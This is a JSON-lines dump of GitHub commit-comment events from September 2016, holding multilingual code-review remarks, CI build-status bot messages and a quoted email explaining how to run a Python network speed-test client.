{"id":"4521896481","type":"CommitCommentEvent","actor":{"login":"JoshTheDev"},"repo":{"name":"SpleefLeague/Core"},"payload":{"comment":{"id":18912865,"position":null,"line":null,"path":null,"commit_id":"437dbc6acaf3b5e4f0ee1e167dc5b776543d7e95","created_at":"2016-09-06T15:05:41Z","updated_at":"2016-09-06T15:05:41Z","body":"That was the basis by which it was done, @WouterG :)"}},"created_at":"2016-09-06T15:05:41Z"}
{"id":"4521897935","type":"CommitCommentEvent","actor":{"login":"rikky0611"},"repo":{"name":"ka0ru19/Matchy"},"payload":{"comment":{"id":18912866,"position":29,"line":29,"path":"MatchyTest01/AnswerConfirmViewController.swift","commit_id":"41621586ec151e93b6fdd3c083e823df765c09a1","created_at":"2016-09-06T15:05:54Z","updated_at":"2016-09-06T15:05:54Z","body":"MatchyColorのインスタンス変数にするんじゃなくて、class関数の返り値かクラス変数としてRGB値をもたせた方が毎回インスタンス化しなくてすむ。"}},"created_at":"2016-09-06T15:05:54Z"}
{"id":"4521902805","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18912873,"position":null,"line":null,"path":null,"commit_id":"c656387c6d48621c0f9f9ad5fcf87c18b52ba576","created_at":"2016-09-06T15:06:38Z","updated_at":"2016-09-06T15:06:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 927](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12717&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T15:06:38Z"}
{"id":"4521906319","type":"CommitCommentEvent","actor":{"login":"gaizka-allende"},"repo":{"name":"github/hubot-scripts"},"payload":{"comment":{"id":18912879,"position":null,"line":null,"path":null,"commit_id":"247310f83e8f0a33230c4a2ceb5e68ca86006e18","created_at":"2016-09-06T15:07:11Z","updated_at":"2016-09-06T15:07:11Z","body":"SHIPIT"}},"created_at":"2016-09-06T15:07:11Z"}
{"id":"4521913697","type":"CommitCommentEvent","actor":{"login":"rikky0611"},"repo":{"name":"ka0ru19/Matchy"},"payload":{"comment":{"id":18912889,"position":141,"line":141,"path":"MatchyTest01/AnswerConfirmViewController.swift","commit_id":"41621586ec151e93b6fdd3c083e823df765c09a1","created_at":"2016-09-06T15:08:21Z","updated_at":"2016-09-06T15:08:21Z","body":"できたらこうゆうそのクラス内でしか呼ばれない関数にはprivateつけとく"}},"created_at":"2016-09-06T15:08:21Z"}
{"id":"4521915107","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18912890,"position":null,"line":null,"path":null,"commit_id":"ec57db2bdb69969f60867d6b1d0e34c27801de6f","created_at":"2016-09-06T15:08:34Z","updated_at":"2016-09-06T15:08:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 928](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12728&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T15:08:34Z"}
{"id":"4521916212","type":"CommitCommentEvent","actor":{"login":"Dmitra"},"repo":{"name":"Graphiy/kms"},"payload":{"comment":{"id":18912893,"position":null,"line":null,"path":null,"commit_id":"9fb2f869ea7bbe8055459b890d79abfaf82927e1","created_at":"2016-09-06T15:08:44Z","updated_at":"2016-09-06T15:08:44Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6AtrBF80&#x2F;52-actions-menu\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Actions menu</a>"}},"created_at":"2016-09-06T15:08:44Z"}
{"id":"4521917231","type":"CommitCommentEvent","actor":{"login":"rikky0611"},"repo":{"name":"ka0ru19/Matchy"},"payload":{"comment":{"id":18912895,"position":11,"line":11,"path":"MatchyTest01/AnswerConfirmViewController.swift","commit_id":"41621586ec151e93b6fdd3c083e823df765c09a1","created_at":"2016-09-06T15:08:54Z","updated_at":"2016-09-06T15:08:54Z","body":"継承させないようにfinalをつけとくとよい"}},"created_at":"2016-09-06T15:08:54Z"}
{"id":"4521917974","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"pdep-utn/mumuki-guia-objetos-herencia"},"payload":{"comment":{"id":18912899,"position":10,"line":6,"path":"00003_Intro Herencia/description.md","commit_id":"745bcb7dff485f0870637f24d3caebc5a7a2c7f0","created_at":"2016-09-06T15:09:01Z","updated_at":"2016-09-06T15:09:01Z","body":"@mmatos @JuanchiRios @gcrespi unos tios dos tips más: \r\n\r\n1. Traten de que los enunciados les queden chicos y que cuenten una única idea. Por ejemplo, acá están contando al mismo tiempo la idea de herencia y de que la herencia es simple en wollok. Ambas ideas podrían ser dos ejercicios por separado, o al menos, lo segundo un corolario del primero. \r\n1.  Traten de evitar pedirle al estudiante algo de lo que no hay un ejemplo claro. Por ejemplo, acá están mostrando cómo es la declaración de una clase que tenga un padre, pero no hay ningún ejemplo completo de cómo sacaron el código repetido entre dos clases. Creo que suma mostrar dos clases con código repetido, y luego, cómo quedan al introducir herencia, antes de pedir que lo han ellos\r\n1. Traten de usar comillas frances simples para código one-liner, embebido dentro del párrafo, y comillas francesas triples (code-block) para código multilinea no embebido dentro del párrafo, como este caso\r\n  \r\n```\r\nclass MaestroAgua extends Object {}\r\n```"}},"created_at":"2016-09-06T15:09:01Z"}
{"id":"4521921537","type":"CommitCommentEvent","actor":{"login":"a10ing"},"repo":{"name":"a10ing/vstest01"},"payload":{"comment":{"id":18912905,"position":null,"line":null,"path":null,"commit_id":"2cedbf38020d8b097ddfde9c2e61ecb84d9d0ca9","created_at":"2016-09-06T15:09:34Z","updated_at":"2016-09-06T15:09:34Z","body":"aaaa"}},"created_at":"2016-09-06T15:09:34Z"}
{"id":"4521923079","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18912913,"position":null,"line":null,"path":null,"commit_id":"a909011324005ac412bc23cbbdda2c579829e980","created_at":"2016-09-06T15:09:48Z","updated_at":"2016-09-06T15:09:48Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32297/testReport/) for this commit**"}},"created_at":"2016-09-06T15:09:48Z"}
{"id":"4521926349","type":"CommitCommentEvent","actor":{"login":"ivantedja"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18912923,"position":null,"line":null,"path":null,"commit_id":"8f144923ddaba0ec3097ef8b78a9991220d9bb04","created_at":"2016-09-06T15:10:20Z","updated_at":"2016-09-06T15:10:20Z","body":"It seems that the \"real\" issue is, expiry date always return `1970-01-01T00:00:00` even if the expiry date is **set**\r\n\r\nbecause the expiry date is converted into unix timestamp when it reach `includes/api/class-wc-rest-coupons-controller.php` which cause `includes/wc-rest-functions.php` interpret it incorrectly\r\n\r\nreal expiry date = `2016-09-24` send through `wc_rest_prepare_date_response` as `1474675200`"}},"created_at":"2016-09-06T15:10:20Z"}
{"id":"4521931982","type":"CommitCommentEvent","actor":{"login":"jsmorley"},"repo":{"name":"rainmeter/rainmeter"},"payload":{"comment":{"id":18912938,"position":null,"line":null,"path":null,"commit_id":"06ab8ed6365f3b21c3e069b14b1ff317b7ffde92","created_at":"2016-09-06T15:11:15Z","updated_at":"2016-09-06T15:11:15Z","body":"Sorry, messed up the commit comment. Should be:\r\n\r\nFixes a potential crashing issue with Lua. "}},"created_at":"2016-09-06T15:11:15Z"}
{"id":"4521934119","type":"CommitCommentEvent","actor":{"login":"pbimpisidis"},"repo":{"name":"dfensgmbh/biz.dfch.PS.Appclusive.Client"},"payload":{"comment":{"id":18912945,"position":38,"line":139,"path":"it/KeyNameValue.Tests.ps1","commit_id":"8430ccfe9fcafd7ca07b4ab35788bf4cd8406539","created_at":"2016-09-06T15:11:34Z","updated_at":"2016-09-06T15:11:34Z","body":"@rufer7\r\n Everytime I call Set-ApcKeyNameValue i have to reconnect with the server with Enter-Appclusive otherwise I get error:\r\n`      RuntimeException: Assertion failed: ($keyNameValueExists)`\r\nIs this normal to happen?"}},"created_at":"2016-09-06T15:11:34Z"}
{"id":"4521936042","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18912951,"position":null,"line":null,"path":null,"commit_id":"484c4e05c97fee0b19e0d3664d3f7c29914713ab","created_at":"2016-09-06T15:11:53Z","updated_at":"2016-09-06T15:11:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 929](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12722&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T15:11:53Z"}
{"id":"4521945436","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18912971,"position":null,"line":null,"path":null,"commit_id":"89922b10f6956963351bc6cc66fb6232b204b62a","created_at":"2016-09-06T15:13:21Z","updated_at":"2016-09-06T15:13:21Z","body":"jquery-ui makes a lot of problems with Bootstrap. \r\nwe'd rather not include it for frontend"}},"created_at":"2016-09-06T15:13:21Z"}
{"id":"4521952221","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18912989,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T15:14:26Z","updated_at":"2016-09-06T15:14:26Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T15:14:26Z"}
{"id":"4521952711","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18912991,"position":14,"line":47,"path":"app/views/customers/index.html.erb","commit_id":"1ea438e7b0fb9e8e822916746bdbb47b02c29447","created_at":"2016-09-06T15:14:30Z","updated_at":"2016-09-06T15:14:30Z","body":"vérifie le nb de colonnes entre thead/tbody"}},"created_at":"2016-09-06T15:14:30Z"}
{"id":"4521956072","type":"CommitCommentEvent","actor":{"login":"citizenmatt"},"repo":{"name":"JetBrains/resharper-cyclomatic-complexity"},"payload":{"comment":{"id":18913004,"position":null,"line":null,"path":null,"commit_id":"87aca6d6d16569b16d358119dfd25906efd90137","created_at":"2016-09-06T15:15:00Z","updated_at":"2016-09-06T15:15:00Z","body":"Done!"}},"created_at":"2016-09-06T15:15:00Z"}
{"id":"4521956963","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18913008,"position":null,"line":null,"path":null,"commit_id":"e187e4b0748cf0a9f2f9e8f7052563bcf419e630","created_at":"2016-09-06T15:15:11Z","updated_at":"2016-09-06T15:15:11Z","body":"The following doc(s) have been deployed to the [tinefinpat](https://tinefinpat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-preserve-history](https://tinefinpat-static-docs.pantheonsite.io/docs/migrate-preserve-history)\n"}},"created_at":"2016-09-06T15:15:11Z"}
{"id":"4521961166","type":"CommitCommentEvent","actor":{"login":"Jonatanmdez"},"repo":{"name":"Optimiza-Click/no-more-passwords-wp"},"payload":{"comment":{"id":18913020,"position":null,"line":null,"path":null,"commit_id":"3ccef448d9dd164fcc6177634c5a214518dca19b","created_at":"2016-09-06T15:15:47Z","updated_at":"2016-09-06T15:15:47Z","body":"Things*"}},"created_at":"2016-09-06T15:15:47Z"}
{"id":"4521962192","type":"CommitCommentEvent","actor":{"login":"BoPeng"},"repo":{"name":"BoPeng/SOS"},"payload":{"comment":{"id":18913024,"position":null,"line":null,"path":null,"commit_id":"901645db7149ad9d6498949e2068e425c3c211ed","created_at":"2016-09-06T15:15:56Z","updated_at":"2016-09-06T15:15:56Z","body":"The idea is to first replace filename(s) in sos_step with FileTarget(s) and move `dynamic` from option to function, and then generalize target to other targets."}},"created_at":"2016-09-06T15:15:56Z"}
{"id":"4521962391","type":"CommitCommentEvent","actor":{"login":"tcratius"},"repo":{"name":"pooleja/SpeedE16"},"payload":{"comment":{"id":18913025,"position":null,"line":null,"path":null,"commit_id":"4d8dd1989dcdde8fc2bb413d316eb3cf88346780","created_at":"2016-09-06T15:15:57Z","updated_at":"2016-09-06T15:15:57Z","body":"Sorry i often run before i walk. I did read the readme file but can't\nremember. I guess my logical side of my brains goes out the window. The\nclient.py is just a document file that you fill with your code and run\nthrough python. I promise to take a look in the morning. I do like the name\nspeede was a nickname i had when i was younger. Thanks for your patients\nand hope to be on the server come tomorrow.  :) ps i find sitting for long\nperiods hurts my back but not an excuse for not properly reading the\nreadme.\n\nOn 6 Sep 2016 23:34, \"James\" <notifications@github.com> wrote:\n\n> Did you take a look at the main Readme.md?\n>\n> Once you have the server running:\n>\n> $ python3 speedE16-server.py\n>\n> You can run the client.py against it like so:\n>\n> $ python3 client.py\n> Running upload/download test against: 0.0.0.0\n> Created temp file: /home/ubuntu/SpeedE16/client-data/V31X6MAMU029FFY8DBAJ\n> Generated a hash of the temp file: 18d909ccf9151f8aa52b41f0b9312b93391c57c0f895d4f0dab573af5cd51cf2\n> Uploaded the file.  Elapsed time: 0.6494739055633545\n> Upload shows success\n> Downloading: http://0.0.0.0:8016/download?file=1U85DVKFJLY6M6J7HIGN to: /home/ubuntu/SpeedE16/client-data/1U85DVKFJLY6M6J7HIGN\n> Downloaded the file.  Elapsed Time: 0.5735130310058594\n> Download shows success\n> Deleted the temp downloaded file: /home/ubuntu/SpeedE16/client-data/V31X6MAMU029FFY8DBAJ\n> Upload Speed: 12.31766192832765 Mbps\n> Download Speed: 13.94911635393733 Mbps\n>\n> This shows that the client has connected to your local speed server and\n> tested upload/download speeds.\n>\n> Does that make sense?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pooleja/SpeedE16/commit/4d8dd1989dcdde8fc2bb413d316eb3cf88346780#commitcomment-18910992>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AU91PnbwkBs6zgcqwpGbzmlipVLMXB5pks5qnWv_gaJpZM4J1oWZ>\n> .\n>\n"}},"created_at":"2016-09-06T15:15:57Z"}
{"id":"4521962932","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913029,"position":null,"line":null,"path":null,"commit_id":"c656387c6d48621c0f9f9ad5fcf87c18b52ba576","created_at":"2016-09-06T15:16:03Z","updated_at":"2016-09-06T15:16:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 927](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12717&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:24"}},"created_at":"2016-09-06T15:16:03Z"}
{"id":"4521963106","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18913030,"position":23,"line":84,"path":"app/views/customers/index.html.erb","commit_id":"1ea438e7b0fb9e8e822916746bdbb47b02c29447","created_at":"2016-09-06T15:16:05Z","updated_at":"2016-09-06T15:16:05Z","body":"add title with complete desc"}},"created_at":"2016-09-06T15:16:05Z"}
{"id":"4521964207","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913032,"position":null,"line":null,"path":null,"commit_id":"ec57db2bdb69969f60867d6b1d0e34c27801de6f","created_at":"2016-09-06T15:16:15Z","updated_at":"2016-09-06T15:16:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 928](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12728&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:07:41"}},"created_at":"2016-09-06T15:16:15Z"}
{"id":"4521966808","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18913042,"position":5,"line":186,"path":"config/locales/en.yml","commit_id":"1ea438e7b0fb9e8e822916746bdbb47b02c29447","created_at":"2016-09-06T15:16:36Z","updated_at":"2016-09-06T15:16:36Z","body":"ce n'est pas 'user' mais 'customer'"}},"created_at":"2016-09-06T15:16:36Z"}
{"id":"4521967332","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18913045,"position":6,"line":187,"path":"config/locales/en.yml","commit_id":"1ea438e7b0fb9e8e822916746bdbb47b02c29447","created_at":"2016-09-06T15:16:41Z","updated_at":"2016-09-06T15:16:41Z","body":"idem"}},"created_at":"2016-09-06T15:16:41Z"}
{"id":"4521968524","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"jaymedavis/stripe.net"},"payload":{"comment":{"id":18913049,"position":null,"line":null,"path":null,"commit_id":"d44439ea2bfc3266c543368c397531cb657599af","created_at":"2016-09-06T15:16:53Z","updated_at":"2016-09-06T15:16:53Z","body":"Thanks! I have in a local branch but haven't deployed it yet :)"}},"created_at":"2016-09-06T15:16:53Z"}
{"id":"4521968886","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18913051,"position":5,"line":186,"path":"config/locales/fr.yml","commit_id":"1ea438e7b0fb9e8e822916746bdbb47b02c29447","created_at":"2016-09-06T15:16:56Z","updated_at":"2016-09-06T15:16:56Z","body":"ce n'est pas 'utilisateur' mais 'compte client'"}},"created_at":"2016-09-06T15:16:56Z"}
{"id":"4521968936","type":"CommitCommentEvent","actor":{"login":"bakkdoor"},"repo":{"name":"polleverywhere/quebert"},"payload":{"comment":{"id":18913052,"position":null,"line":null,"path":null,"commit_id":"7dab94ab95a3d87de87d7e8675f5704079bf2618","created_at":"2016-09-06T15:16:56Z","updated_at":"2016-09-06T15:16:56Z","body":"Sounds good, pushed a new commit ( 5cb8a5c20f82bcb153c82248679b2addabb707c2 )"}},"created_at":"2016-09-06T15:16:56Z"}
{"id":"4521969434","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18913055,"position":6,"line":187,"path":"config/locales/fr.yml","commit_id":"1ea438e7b0fb9e8e822916746bdbb47b02c29447","created_at":"2016-09-06T15:17:01Z","updated_at":"2016-09-06T15:17:01Z","body":"idem"}},"created_at":"2016-09-06T15:17:01Z"}
{"id":"4521969908","type":"CommitCommentEvent","actor":{"login":"robsonpeixoto"},"repo":{"name":"rubyide/vscode-ruby"},"payload":{"comment":{"id":18913059,"position":null,"line":null,"path":null,"commit_id":"b69fb50645363d8d9a430b12d41f27995f3ee722","created_at":"2016-09-06T15:17:07Z","updated_at":"2016-09-06T15:17:07Z","body":"thanks"}},"created_at":"2016-09-06T15:17:07Z"}
{"id":"4521978731","type":"CommitCommentEvent","actor":{"login":"zpywoyaoainiyibeizi"},"repo":{"name":"wuxia2001/loveyue"},"payload":{"comment":{"id":18913079,"position":null,"line":null,"path":null,"commit_id":"e139669508a689801ff79f2c08094a479b4d91a5","created_at":"2016-09-06T15:18:33Z","updated_at":"2016-09-06T15:18:33Z","body":"求下载地址 我复制的不能用"}},"created_at":"2016-09-06T15:18:33Z"}
{"id":"4521983253","type":"CommitCommentEvent","actor":{"login":"zpywoyaoainiyibeizi"},"repo":{"name":"wuxia2001/loveyue"},"payload":{"comment":{"id":18913090,"position":null,"line":null,"path":null,"commit_id":"e139669508a689801ff79f2c08094a479b4d91a5","created_at":"2016-09-06T15:19:16Z","updated_at":"2016-09-06T15:19:16Z","body":"求下载地址 我复制的不能用"}},"created_at":"2016-09-06T15:19:16Z"}
{"id":"4521983712","type":"CommitCommentEvent","actor":{"login":"pbi-qfs"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":18913094,"position":22,"line":93,"path":"java/client/src/org/openqa/selenium/safari/SafariDriver.java","commit_id":"2a4fb0697c4e93243ae2dd81f6f5c191d11fee31","created_at":"2016-09-06T15:19:20Z","updated_at":"2016-09-06T15:19:20Z","body":"Shouldn't it be _! isLegacy(options)_ here? (since on a legacy system service is always _null_)"}},"created_at":"2016-09-06T15:19:20Z"}
{"id":"4521985060","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/HIP-tools"},"payload":{"comment":{"id":18913096,"position":34,"line":450,"path":"installer/main.py","commit_id":"4ccb77b32900adb0552a6d9d4fb030e896aadfb9","created_at":"2016-09-06T15:19:35Z","updated_at":"2016-09-06T15:19:35Z","body":"hmm.  it appears you are checksumming the unencrypted file contents. which might also be limited to a 4K header."}},"created_at":"2016-09-06T15:19:35Z"}
{"id":"4521990769","type":"CommitCommentEvent","actor":{"login":"asendecka"},"repo":{"name":"asendecka/webassets"},"payload":{"comment":{"id":18913107,"position":81,"line":97,"path":"src/webassets/filter/node_sass.py","commit_id":"149d7f5f9a763b0fb3eb6d92623d342398ce39f4","created_at":"2016-09-06T15:20:32Z","updated_at":"2016-09-06T15:20:32Z","body":"It should be `out.write(stdout.read().decode('utf-8'))`"}},"created_at":"2016-09-06T15:20:32Z"}
{"id":"4521991613","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913108,"position":null,"line":null,"path":null,"commit_id":"484c4e05c97fee0b19e0d3664d3f7c29914713ab","created_at":"2016-09-06T15:20:40Z","updated_at":"2016-09-06T15:20:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 929](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12722&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:47"}},"created_at":"2016-09-06T15:20:40Z"}
{"id":"4521992133","type":"CommitCommentEvent","actor":{"login":"bakkdoor"},"repo":{"name":"polleverywhere/quebert"},"payload":{"comment":{"id":18913112,"position":null,"line":null,"path":null,"commit_id":"7dab94ab95a3d87de87d7e8675f5704079bf2618","created_at":"2016-09-06T15:20:45Z","updated_at":"2016-09-06T15:20:45Z","body":"Looks like it fails for 2.1.10: https://travis-ci.org/polleverywhere/quebert/jobs/157915948\r\nNot sure why, tbh. Should I investigate or just remove support for that version as well?"}},"created_at":"2016-09-06T15:20:45Z"}
{"id":"4521993974","type":"CommitCommentEvent","actor":{"login":"janpanschab"},"repo":{"name":"actum/gulp-dev-stack"},"payload":{"comment":{"id":18913119,"position":1,"line":1,"path":".eslintrc","commit_id":"f1e7329b12eb7b4a3b0fcc6516702d2b378f2f80","created_at":"2016-09-06T15:21:03Z","updated_at":"2016-09-06T15:21:03Z","body":"We want to have all config files in package json (if possible). Is it possible to only extend the airbnb config (like here - https://github.com/airbnb/javascript/tree/master/packages/eslint-config-airbnb#eslint-config-airbnb-1)?"}},"created_at":"2016-09-06T15:21:03Z"}
{"id":"4521994092","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18913120,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-06T15:21:05Z","updated_at":"2016-09-06T15:21:05Z","body":"Turns out the message isn't needed at all, refresh is enough. I tested your PR today and fixed a few issues. Let's continue the discussion there (#80)."}},"created_at":"2016-09-06T15:21:05Z"}
{"id":"4521995041","type":"CommitCommentEvent","actor":{"login":"pbi-qfs"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":18913124,"position":29,"line":100,"path":"java/client/src/org/openqa/selenium/safari/SafariDriver.java","commit_id":"2a4fb0697c4e93243ae2dd81f6f5c191d11fee31","created_at":"2016-09-06T15:21:14Z","updated_at":"2016-09-06T15:21:14Z","body":"_options.toCapabilities()_ always returns a value, where only the safari defaults and safari.options are set. Currently, there is no way to set the _USE_LEGACY_DRIVER_CAPABILITY_ flag so this line always returns _null_."}},"created_at":"2016-09-06T15:21:14Z"}
{"id":"4521997406","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913129,"position":null,"line":null,"path":null,"commit_id":"2811dcc19c21802ce50d483e544f1baec0e064c8","created_at":"2016-09-06T15:21:36Z","updated_at":"2016-09-06T15:21:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 930](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12738&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T15:21:36Z"}
{"id":"4521997666","type":"CommitCommentEvent","actor":{"login":"jhoenicke"},"repo":{"name":"ultimate-pa/smtinterpol"},"payload":{"comment":{"id":18913130,"position":null,"line":null,"path":null,"commit_id":"2aaa315b2355e8fe6f1a19a0c1aa328ea4d7c42b","created_at":"2016-09-06T15:21:39Z","updated_at":"2016-09-06T15:21:39Z","body":"We're currently merging into ultimate, which revealed several small problems.  Once we get these resolved I make a new release."}},"created_at":"2016-09-06T15:21:39Z"}
{"id":"4522000111","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18913133,"position":50,"line":229,"path":"src/Elasticsearch/Repositories/ElasticReadOnlyRepositoryBase.cs","commit_id":"2d5db085dc7ea2620607011366047718dfee3f3b","created_at":"2016-09-06T15:22:02Z","updated_at":"2016-09-06T15:22:02Z","body":"We should move this closer to the usage in case id list is empty\r\n\r\n"}},"created_at":"2016-09-06T15:22:02Z"}
{"id":"4522003673","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18913145,"position":82,"line":260,"path":"src/Elasticsearch/Repositories/ElasticReadOnlyRepositoryBase.cs","commit_id":"2d5db085dc7ea2620607011366047718dfee3f3b","created_at":"2016-09-06T15:22:38Z","updated_at":"2016-09-06T15:22:38Z","body":"This is duplicated the line above."}},"created_at":"2016-09-06T15:22:38Z"}
{"id":"4522004840","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"pdep-utn/mumuki-guia-objetos-herencia"},"payload":{"comment":{"id":18913147,"position":1,"line":1,"path":"00005_Cambios de lógica/description.md","commit_id":"4f3165a37b5f15a6af1d404799d0bffddf37c7e0","created_at":"2016-09-06T15:22:49Z","updated_at":"2016-09-06T15:22:49Z","body":"@JuanchiRios @mmatos ojo que está quedando un poco largo y con mucho texto y se dificulta leer todo en la plataforma sin hacer scroll. \r\n\r\nSi no se puede recortar o dividir el ejercicio y va a quedar largo, utilicen siempre que puedan el layout `editor_bottom`, que haca más cómoda la lectura cuando el enunciado es largo. "}},"created_at":"2016-09-06T15:22:49Z"}
{"id":"4522005915","type":"CommitCommentEvent","actor":{"login":"ryanlovett"},"repo":{"name":"yuvipanda/jupyterhub-systemd-spawner"},"payload":{"comment":{"id":18913152,"position":null,"line":null,"path":null,"commit_id":"12bcc0c60c29c6434eefad046f91e37f28e9eaaa","created_at":"2016-09-06T15:23:00Z","updated_at":"2016-09-06T15:23:00Z","body":"References ldapauthenticator. Guessing that's not what you want here?"}},"created_at":"2016-09-06T15:23:00Z"}
{"id":"4522007949","type":"CommitCommentEvent","actor":{"login":"janpanschab"},"repo":{"name":"actum/gulp-dev-stack"},"payload":{"comment":{"id":18913157,"position":4,"line":12,"path":"gulp/tasks/lint.js","commit_id":"f1e7329b12eb7b4a3b0fcc6516702d2b378f2f80","created_at":"2016-09-06T15:23:19Z","updated_at":"2016-09-06T15:23:19Z","body":"The goal here is to have different option for development and production mode. Production mode should be very strict. Development mode should not has some of these strict rules like `no-unused-vars`."}},"created_at":"2016-09-06T15:23:19Z"}
{"id":"4522010425","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18913166,"position":93,"line":270,"path":"src/Elasticsearch/Repositories/ElasticReadOnlyRepositoryBase.cs","commit_id":"2d5db085dc7ea2620607011366047718dfee3f3b","created_at":"2016-09-06T15:23:41Z","updated_at":"2016-09-06T15:23:41Z","body":"This seems like an extra cast as you already have the document."}},"created_at":"2016-09-06T15:23:41Z"}
{"id":"4522013001","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18913173,"position":5,"line":88,"path":"src/Elasticsearch/Repositories/ElasticRepositoryBase.cs","commit_id":"2d5db085dc7ea2620607011366047718dfee3f3b","created_at":"2016-09-06T15:24:06Z","updated_at":"2016-09-06T15:24:06Z","body":"We might want to go through and see where we can use EmptyList"}},"created_at":"2016-09-06T15:24:06Z"}
